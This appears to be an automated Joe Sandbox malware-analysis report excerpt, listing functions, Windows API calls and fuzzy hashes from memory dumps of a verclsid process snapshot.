Source File: 00000007.00000002.3361086022.00000000003B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 003B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3b0000_verclsid.jbxd

Yara matches

Similarity

API ID:
String ID: #I$'O$(e$2Z$9$>t$?$G$NK$R=$Um$W#$\$f$o}$u$yB$z"$5$:$|
API String ID: 0-534497107
Opcode ID: d99a973a2fddd224bf94c619d838c5bb40c5313898daeb5072dc1ed5636ffd2f
Instruction ID: 6ac1019f35f6dc1fc99b1476ba90a6a061714a6763244a897d66650f7970cd43
Opcode Fuzzy Hash: d99a973a2fddd224bf94c619d838c5bb40c5313898daeb5072dc1ed5636ffd2f
Instruction Fuzzy Hash: 59E1D3B0D05A29CFEB25CF98C894BEDBBB1FB40308F208199C1097B681D7B95A85DF55

Function 003CC460 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(?,00000000), ref: 003CC544
FindNextFileW.KERNELBASE(?,00000010), ref: 003CC57F
FindClose.KERNELBASE(?), ref: 003CC58A

Memory Dump Source

Source File: 00000007.00000002.3361086022.00000000003B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 003B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3b0000_verclsid.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNext
String ID:
API String ID: 3541575487-0
Opcode ID: 25d8c32ac73351282a7df8be7540f7ff9f3507150f35722bbf60f4774898870c
Instruction ID: ba0067f2e459fdcd1b415ac268bb0036fe9bd34029fba0b30f22bd399b088da9
Opcode Fuzzy Hash: 25d8c32ac73351282a7df8be7540f7ff9f3507150f35722bbf60f4774898870c
Instruction Fuzzy Hash: FD318772900308BBDB21DF65CC46FEB77BCEF45744F14449DF909AA181DA70AE858BA0

Function 003D8F80 Relevance: 1.6, APIs: 1, Instructions: 101filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(EA1C6576,?,?,?,?,?,?,?,?,?,?), ref: 003D907E

Memory Dump Source

Source File: 00000007.00000002.3361086022.00000000003B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 003B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3b0000_verclsid.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: d9774e6064a96e333b566dc55169cafcbbb4701f5fb4a2273effae9a8f3b038f
Instruction ID: 4b40ed2322dd643b79ea244b8834fab73de705566eac0a1c1b91328c28a22a4e
Opcode Fuzzy Hash: d9774e6064a96e333b566dc55169cafcbbb4701f5fb4a2273effae9a8f3b038f
Instruction Fuzzy Hash: 4731E6B5A10208AFCB14DF99D881EEEB7F9AF88304F108209F919A7340D734A811CFA1

Function 003D90F0 Relevance: 1.6, APIs: 1, Instructions: 93filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(EA1C6576,?,?,?,?,?,?,?,?), ref: 003D91D9

Memory Dump Source

Source File: 00000007.00000002.3361086022.00000000003B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 003B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3b0000_verclsid.jbxd

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1b72726ad5e53812508e8f97e74b4d9af357949170d0e60f3a87850d58f1a0e3
Instruction ID: 414ee5143f54ad9fbb495127dda32b050264d8a445d6c78e18135887d5a7e501
Opcode Fuzzy Hash: 1b72726ad5e53812508e8f97e74b4d9af357949170d0e60f3a87850d58f1a0e3
Instruction Fuzzy Hash: 9F31E9B5A00608AFDB14DF99D841EDFB7B9EF88314F10820AF919AB345D774A911CFA1

Function 003D93F0 Relevance: 1.6, APIs: 1, Instructions: 81memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(EA1C6576,?,003D7EBF,00000000,00000004,00003000,?,?,?,?,?,003D7EBF,003C1C3E), ref: 003D94B8

Memory Dump Source

Source File: 00000007.00000002.3361086022.00000000003B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 003B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3b0000_verclsid.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 94d26d4b1facfa4accc8706993e449ba619a0b1c9fa88c04f64456cc40328c80
Instruction ID: a5128d5b1c932bfecf739e0ad2922d7556358cc3c7add306743cbf584fea4285
Opcode Fuzzy Hash: 94d26d4b1facfa4accc8706993e449ba619a0b1c9fa88c04f64456cc40328c80
Instruction Fuzzy Hash: 792119B5A00608ABDB14DF99DC41FEFB7B9EF88304F10810AF918AB341D774A911CBA1

Function 003D91F0 Relevance: 1.6, APIs: 1, Instructions: 61filenativeCOMMON

Download Yara Rule

APIs

NtDeleteFile.NTDLL(EA1C6576), ref: 003D9286

Memory Dump Source

Source File: 00000007.00000002.3361086022.00000000003B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 003B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3b0000_verclsid.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 97c73d4813665a42643c06377cd8bce0ca9e2563b00c33c67a044921d853c8aa
Instruction ID: 15885b6534e3c998b23c385511ed7021383f1fd52fd68a3c04f1d98dc821e62e
Opcode Fuzzy Hash: 97c73d4813665a42643c06377cd8bce0ca9e2563b00c33c67a044921d853c8aa
Instruction Fuzzy Hash: A41173729106087BD621EB65DC02FEFB37CDF85715F10814AF9186B281E77479118BA5

Function 003D9290 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 003D92C4

Memory Dump Source

Source File: 00000007.00000002.3361086022.00000000003B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 003B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3b0000_verclsid.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 13aea458c4dd10709b068c53b11a86730bd5b72ae72742d61fe1a6e295c2ee1f
Instruction ID: a55c9ad03c7e0c3b2bb276c84c81964494650766ffaa9017edabb8da1258b7c5
Opcode Fuzzy Hash: 13aea458c4dd10709b068c53b11a86730bd5b72ae72742d61fe1a6e295c2ee1f
Instruction Fuzzy Hash: CCE046362106487BD620AA5ADC06F9B77ACDBC5724F418055FA08AB242C6B1B90086E4

Function 045D4650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 045D465A

Memory Dump Source

Source File: 00000007.00000002.3362901912.0000000004560000.00000040.00001000.00020000.00000000.sdmp, Offset: 04560000, based on PE: true

Associated: 00000007.00000002.3362901912.0000000004689000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3362901912.000000000468D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3362901912.00000000046FE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4560000_verclsid.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1f95d5bd9ab105e5c3201709f51bf444bd5fa62272e98412955fdd132c0db15e
Instruction ID: 213581cf79f11f286e2c58a026f65daaa7e87e8f03e1f68fb4968e2ecae1afaf
Opcode Fuzzy Hash: 1f95d5bd9ab105e5c3201709f51bf444bd5fa62272e98412955fdd132c0db15e
Instruction Fuzzy Hash: 3F900261601500436144725948044166045ABE1315399C115A0555660C8618D955B269

Function 045D4340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 045D434A

Memory Dump Source

Source File: 00000007.00000002.3362901912.0000000004560000.00000040.00001000.00020000.00000000.sdmp, Offset: 04560000, based on PE: true

Associated: 00000007.00000002.3362901912.0000000004689000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3362901912.000000000468D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3362901912.00000000046FE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4560000_verclsid.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7615ff51e10d120bb4f72a8c42b0104825ce8c265e7bc62a5daf5d56494b86ca
Instruction ID: ecad11386f9eb610741c024986ac8846f0edfcf733da627d97d467e7ec9b71b3
Opcode Fuzzy Hash: 7615ff51e10d120bb4f72a8c42b0104825ce8c265e7bc62a5daf5d56494b86ca
Instruction Fuzzy Hash: 5290023160580013B144725948845564045ABE0315B59C011E0425654C8A14DA567361

Function 045D2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 045D2C7A

Memory Dump Source

Source File: 00000007.00000002.3362901912.0000000004560000.00000040.00001000.00020000.00000000.sdmp, Offset: 04560000, based on PE: true

Associated: 00000007.00000002.3362901912.0000000004689000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3362901912.000000000468D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3362901912.00000000046FE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4560000_verclsid.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: bb64c7428da2d1edc7856362becabd641643cb01d1ea5b53c7249de5c13b00be
Instruction ID: a407d6d26cebde5ca02cc84cd1e567c7a74a2eea1fc77a483ec258777b9b9424
Opcode Fuzzy Hash: bb64c7428da2d1edc7856362becabd641643cb01d1ea5b53c7249de5c13b00be
Instruction Fuzzy Hash: 1890023120148803F1147259840475A00459BD0315F5DC411A4425758D8695D9917121

Function 045D2C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 045D2C6A

Memory Dump Source

Source File: 00000007.00000002.3362901912.0000000004560000.00000040.00001000.00020000.00000000.sdmp, Offset: 04560000, based on PE: true

Associated: 00000007.00000002.3362901912.0000000004689000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3362901912.000000000468D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3362901912.00000000046FE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4560000_verclsid.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 84187f6e05a4366be0340709dab41f1555d6bd5503a465813f5f201f3f78abaa
Instruction ID: b8f57fccfdcbd7fc1f868906918cf1c466a77594c44be650b35a15aea44c12c7
Opcode Fuzzy Hash: 84187f6e05a4366be0340709dab41f1555d6bd5503a465813f5f201f3f78abaa
Instruction Fuzzy Hash: 8F90023120140843F10472594404B5600459BE0315F59C016A0125754D8615D9517521

Function 045D2CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 045D2CAA

Memory Dump Source

Source File: 00000007.00000002.3362901912.0000000004560000.00000040.00001000.00020000.00000000.sdmp, Offset: 04560000, based on PE: true

Associated: 00000007.00000002.3362901912.0000000004689000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3362901912.000000000468D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3362901912.00000000046FE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4560000_verclsid.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9b0dc099ef337d322e6b4830acd624f9770ed53662e2b810314dc780dc7a0e6c
Instruction ID: 7bf8763e634a5d200c9e1347a4f8b3b65f61c85ccd9c08ed9e8c8a54a448c3ee
Opcode Fuzzy Hash: 9b0dc099ef337d322e6b4830acd624f9770ed53662e2b810314dc780dc7a0e6c
Instruction Fuzzy Hash: 8F90023120140403F1047699540865600459BE0315F59D011A5025655EC665D9917131

Function 045D2D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 045D2D1A

Memory Dump Source

Source File: 00000007.00000002.3362901912.0000000004560000.00000040.00001000.00020000.00000000.sdmp, Offset: 04560000, based on PE: true

Associated: 00000007.00000002.3362901912.0000000004689000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3362901912.000000000468D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3362901912.00000000046FE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4560000_verclsid.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3063f8a1af3409a12e4ff3ee2c59259a27b17a252bd3184d857e6dc8b23b38f8
Instruction ID: 992451abda051db3b07aa23180b2107c0c7d4c70ae9f25ce16711607d40093fa
Opcode Fuzzy Hash: 3063f8a1af3409a12e4ff3ee2c59259a27b17a252bd3184d857e6dc8b23b38f8
Instruction Fuzzy Hash: F990022921340003F1847259540861A00459BD1216F99D415A0016658CC915D9697321

Function 045D2D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 045D2D3A

Memory Dump Source

Source File: 00000007.00000002.3362901912.0000000004560000.00000040.00001000.00020000.00000000.sdmp, Offset: 04560000, based on PE: true

Associated: 00000007.00000002.3362901912.0000000004689000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3362901912.000000000468D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3362901912.00000000046FE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4560000_verclsid.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: db967feab9ab6555501130f142b68145590469827c5312066e0f28ffb2abed10
Instruction ID: 77fed087d7a19fbe3df43bc2f274fe9bf7a6517d6835530d480b091b10dd6498
Opcode Fuzzy Hash: db967feab9ab6555501130f142b68145590469827c5312066e0f28ffb2abed10
Instruction Fuzzy Hash: 9A90022130140003F144725954186164045EBE1315F59D011E0415654CD915D9567222

Function 045D2DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 045D2DDA

Memory Dump Source

Source File: 00000007.00000002.3362901912.0000000004560000.00000040.00001000.00020000.00000000.sdmp, Offset: 04560000, based on PE: true

Associated: 00000007.00000002.3362901912.0000000004689000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3362901912.000000000468D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3362901912.00000000046FE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4560000_verclsid.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: dbcce13aa3bb1732a124bcab089727a34d60b66ad50063beb32e852b5a5f9540
Instruction ID: 4f8d0738bcd3b1374e8985a8d48f152ab69af75259456cebba0226d632cc6628
Opcode Fuzzy Hash: dbcce13aa3bb1732a124bcab089727a34d60b66ad50063beb32e852b5a5f9540
Instruction Fuzzy Hash: D3900221242441537549B25944045174046ABE0255799C012A1415A50C8526E956F621

Function 045D2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 045D2DFA

Memory Dump Source

Source File: 00000007.00000002.3362901912.0000000004560000.00000040.00001000.00020000.00000000.sdmp, Offset: 04560000, based on PE: true

Associated: 00000007.00000002.3362901912.0000000004689000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3362901912.000000000468D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3362901912.00000000046FE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4560000_verclsid.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 11747fbced3882300c0748b53e37de7a3a11ae547588340efa067bc6d76b94b0
Instruction ID: 435cbb9d40b8de929fa6b41075429491bd60edf7ccf0bcf069cd634815ae70d2
Opcode Fuzzy Hash: 11747fbced3882300c0748b53e37de7a3a11ae547588340efa067bc6d76b94b0
Instruction Fuzzy Hash: 0290023120140413F1157259450471700499BD0255F99C412A0425658D9656DA52B121

Function 045D2EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 045D2EEA

Memory Dump Source

Source File: 00000007.00000002.3362901912.0000000004560000.00000040.00001000.00020000.00000000.sdmp, Offset: 04560000, based on PE: true

Associated: 00000007.00000002.3362901912.0000000004689000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3362901912.000000000468D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3362901912.00000000046FE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4560000_verclsid.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 02d1f3c5f80658b256f1fc6d2011a3b1bba934e03bd51a2a4be5f6fbacdafc81
Instruction ID: 030e503db6b8e8c29c0129738c4c84fcd8d52e8b44a4d3669ade3702f454e539
Opcode Fuzzy Hash: 02d1f3c5f80658b256f1fc6d2011a3b1bba934e03bd51a2a4be5f6fbacdafc81
Instruction Fuzzy Hash: 8390026120180403F1447659480461700459BD0316F59C011A2065655E8A29DD517135

Function 045D2E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 045D2E8A

Memory Dump Source

Source File: 00000007.00000002.3362901912.0000000004560000.00000040.00001000.00020000.00000000.sdmp, Offset: 04560000, based on PE: true

Associated: 00000007.00000002.3362901912.0000000004689000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3362901912.000000000468D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3362901912.00000000046FE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4560000_verclsid.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e12c5bff8a9a9a3c1f775cc838c9827d9ba22ff9d87241feeebe142cd88f1672
Instruction ID: afa764a09b7dff5715e6b8b13cbfae3bd9fdf5df518301bc65f5af4d37ce786b
Opcode Fuzzy Hash: e12c5bff8a9a9a3c1f775cc838c9827d9ba22ff9d87241feeebe142cd88f1672
Instruction Fuzzy Hash: BC90022160140503F10572594404626004A9BD0255F99C022A1025655ECA25DA92B131

Function 045D2F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 045D2F3A

Memory Dump Source

Source File: 00000007.00000002.3362901912.0000000004560000.00000040.00001000.00020000.00000000.sdmp, Offset: 04560000, based on PE: true

Associated: 00000007.00000002.3362901912.0000000004689000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3362901912.000000000468D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3362901912.00000000046FE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4560000_verclsid.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0399913ca67324f4c9c074e233b0d411aff14d0b02819093475b34f75572f5b8
Instruction ID: cee05d0684b859eab9f6c420f90da267e5de9d804591bc88ca06ef38b54fb422
Opcode Fuzzy Hash: 0399913ca67324f4c9c074e233b0d411aff14d0b02819093475b34f75572f5b8
Instruction Fuzzy Hash: 5C90026134140443F10472594414B160045DBE1315F59C015E1065654D8619DD527126

Function 045D2FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 045D2FEA

Memory Dump Source

Source File: 00000007.00000002.3362901912.0000000004560000.00000040.00001000.00020000.00000000.sdmp, Offset: 04560000, based on PE: true

Associated: 00000007.00000002.3362901912.0000000004689000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3362901912.000000000468D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3362901912.00000000046FE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4560000_verclsid.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a53a44e7dc307a36c253cc4000b5fda03651619e3c37a23e572208553e429f3f
Instruction ID: 912314d43c5f11f91f1e38adf177c77e028a295fb7f0aa062050f9ee4770879f
Opcode Fuzzy Hash: a53a44e7dc307a36c253cc4000b5fda03651619e3c37a23e572208553e429f3f
Instruction Fuzzy Hash: E7900221211C0043F20476694C14B1700459BD0317F59C115A0155654CC915D9617521

Function 045D2FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 045D2FBA

Memory Dump Source

Source File: 00000007.00000002.3362901912.0000000004560000.00000040.00001000.00020000.00000000.sdmp, Offset: 04560000, based on PE: true

Associated: 00000007.00000002.3362901912.0000000004689000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3362901912.000000000468D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3362901912.00000000046FE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4560000_verclsid.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 65a66d6e2ec5c1eefd3d23082b145a2b5a73451e18ca6435d0c6d07117ad67f9
Instruction ID: 302a9f81dbfd34cef534fec8dcfcf02786cc74addc55eafc0aa609ad33ea31c2
Opcode Fuzzy Hash: 65a66d6e2ec5c1eefd3d23082b145a2b5a73451e18ca6435d0c6d07117ad67f9
Instruction Fuzzy Hash: 2F900221601400436144726988449164045BFE1225759C121A0999650D8559D9657665

Function 045D2AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 045D2ADA

Memory Dump Source

Source File: 00000007.00000002.3362901912.0000000004560000.00000040.00001000.00020000.00000000.sdmp, Offset: 04560000, based on PE: true

Associated: 00000007.00000002.3362901912.0000000004689000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3362901912.000000000468D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3362901912.00000000046FE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4560000_verclsid.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: aa6e6cae0863724c0ad272e599ebf4d2f2dc788f4c4b17738505240c75191d3c
Instruction ID: 292d51836f60273612a5d0af70c4eef69026e8d66d435ddbe200237f9e3d5a34
Opcode Fuzzy Hash: aa6e6cae0863724c0ad272e599ebf4d2f2dc788f4c4b17738505240c75191d3c
Instruction Fuzzy Hash: 2B900225211400032109B659070451700869BD5365359C021F1016650CD621D9617121

Function 045D2AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 045D2AFA

Memory Dump Source

Source File: 00000007.00000002.3362901912.0000000004560000.00000040.00001000.00020000.00000000.sdmp, Offset: 04560000, based on PE: true

Associated: 00000007.00000002.3362901912.0000000004689000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3362901912.000000000468D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3362901912.00000000046FE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4560000_verclsid.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f1340002dee375a5c59a35dc0a3a4f4821a99ce87a6f2a7f234444f5cde81e5a
Instruction ID: cff59ddc7b378220ec8b86e9caa0c4556f639aade577cd254fbaeb4135d768cd
Opcode Fuzzy Hash: f1340002dee375a5c59a35dc0a3a4f4821a99ce87a6f2a7f234444f5cde81e5a
Instruction Fuzzy Hash: 95900225221400032149B659060451B0485ABD6365399C015F1417690CC621D9657321

Function 045D2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 045D2B6A

Memory Dump Source

Source File: 00000007.00000002.3362901912.0000000004560000.00000040.00001000.00020000.00000000.sdmp, Offset: 04560000, based on PE: true

Associated: 00000007.00000002.3362901912.0000000004689000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3362901912.000000000468D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3362901912.00000000046FE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4560000_verclsid.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: cf29574f44d5e700ae5f0c25f0f4d0977bad9160a4a594923332843e2ec3a3d0
Instruction ID: 2be5b6c458d3c61a33cb49f7da4c76e07afe33c4be3e3d376a5ff004b1fe1d03
Opcode Fuzzy Hash: cf29574f44d5e700ae5f0c25f0f4d0977bad9160a4a594923332843e2ec3a3d0
Instruction Fuzzy Hash: 1290026120240003610972594414626404A9BE0215B59C021E1015690DC525D9917125

Function 045D2BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 045D2BFA

Memory Dump Source

Source File: 00000007.00000002.3362901912.0000000004560000.00000040.00001000.00020000.00000000.sdmp, Offset: 04560000, based on PE: true

Associated: 00000007.00000002.3362901912.0000000004689000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3362901912.000000000468D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3362901912.00000000046FE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4560000_verclsid.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a00812f532f587987ebacf76375be04e954e69e4eacaf7dd1b89e76a22dbc1d0
Instruction ID: 05208222eca49f966ac192ad49873517f3123e2193df20f3b33c370fc6976488
Opcode Fuzzy Hash: a00812f532f587987ebacf76375be04e954e69e4eacaf7dd1b89e76a22dbc1d0
Instruction Fuzzy Hash: F890023120140803F1847259440465A00459BD1315F99C015A0026754DCA15DB5977A1

Function 045D2BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 045D2BEA

Memory Dump Source

Source File: 00000007.00000002.3362901912.0000000004560000.00000040.00001000.00020000.00000000.sdmp, Offset: 04560000, based on PE: true

Associated: 00000007.00000002.3362901912.0000000004689000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3362901912.000000000468D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3362901912.00000000046FE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4560000_verclsid.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 655f9bcb5e72b0359547fb79f9971a4dc4fdb4386701f4776ba7bb1841e8061c
Instruction ID: 5912a8db0365460e1ace24ecad278d48e4bd98477fcf2fbf4b3805f81489e551
Opcode Fuzzy Hash: 655f9bcb5e72b0359547fb79f9971a4dc4fdb4386701f4776ba7bb1841e8061c
Instruction Fuzzy Hash: F590023120544843F14472594404A5600559BD0319F59C011A0065794D9625DE55B661

Function 045D2BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 045D2BAA

Memory Dump Source

Source File: 00000007.00000002.3362901912.0000000004560000.00000040.00001000.00020000.00000000.sdmp, Offset: 04560000, based on PE: true

Associated: 00000007.00000002.3362901912.0000000004689000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3362901912.000000000468D000.00000040.00001000.00020000.00000000.sdmpDownload File
